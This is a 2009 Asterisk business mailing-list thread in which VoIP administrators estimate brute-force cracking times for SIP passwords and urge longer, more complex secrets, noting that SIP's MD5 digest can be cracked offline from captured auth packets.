Very insightful, thank you Bret. Barring packet sniffing (which can only be done along the route right?) more secure passwords would make a real difference. Here is a question - has anyone on the list had an account hacked where the password wasn't stupid (where stupid=(1234,1111,secret,${EXTEN}, etc))? My thought is, the botnets are probably looking for low hanging fruit. I'd love to know if anyone has evidence that that isn't the case. Andy
Trixter aka Bret McDanel wrote: On Tue, 2009-03-10 at 16:14 -0400, Andrew M. Lauppe wrote:We discussed this on freenode #freepbx today, and someone did the following math.A 20 digit numerical password/secret (numerical meaning only 0-9 - obviously), attacked via brute force at 5,000,000 passwords per second, would take more than 600,000+ years to crack. I didn't verify but it looks about right.20 digit is 100,000,000,000,000,000,000 combinations assuming that there are no blacklisted ones in that space. 100,000,000,000,000 seconds at 5M/sec. (for reference about what the total US debt is including social security and other things that normally dont show on the national debt numbers). about 3.1M years for an exhaustive search, statistically speaking it would be half that time on average if you are doing multiple, or about 1.6M years. If the password is alphanumeric then it goes from 100 million trillion to 13,367,495,000,000,000,000,000,000,000,000 or 13,367 trillion trillion and I am not even going into case sensitivity or other characters that could be used. If you just used upper case letters and numbers, 10 characters would be about 23 years @ 5M/sec for an exhaustive search. 12 would be 30k years. See below about how this time could be shortened.Lesson of the day? Sure, more secure passwords aren't THE solution, but they sure help. I'm pretty sure any attempt to brute force a SIP password on an asterisk box at anything approching 5 million passwords per second would have side effects that would bring the attack to your attention (like bringing your sip stack to it's knees perhaps?)it depends on how they are doing it. Brute forcing *can* be via capture packets, everything needed to get the password is in the auth packets in sip. There are a lot of different ways to get the hashes, they may be able to get the hash without really doing much else, or they may be in a position to do much more evil things.With most phones being auto-provisioned, the length of the password shouldn't be a limiting factor. Make your passwords/secrets more complex and we can be done with this conversation. Please.Well it is MD5 in sip, so the 5M/sec doesnt really hold if they are doing it on a botnet or similar that is outside your control via captured headers. Of course stopping people from capturing headers is beyond the scope of a packet filtering system. |
_______________________________________________ --Bandwidth and Colocation Provided by http://www.api-digital.com-- asterisk-biz mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-biz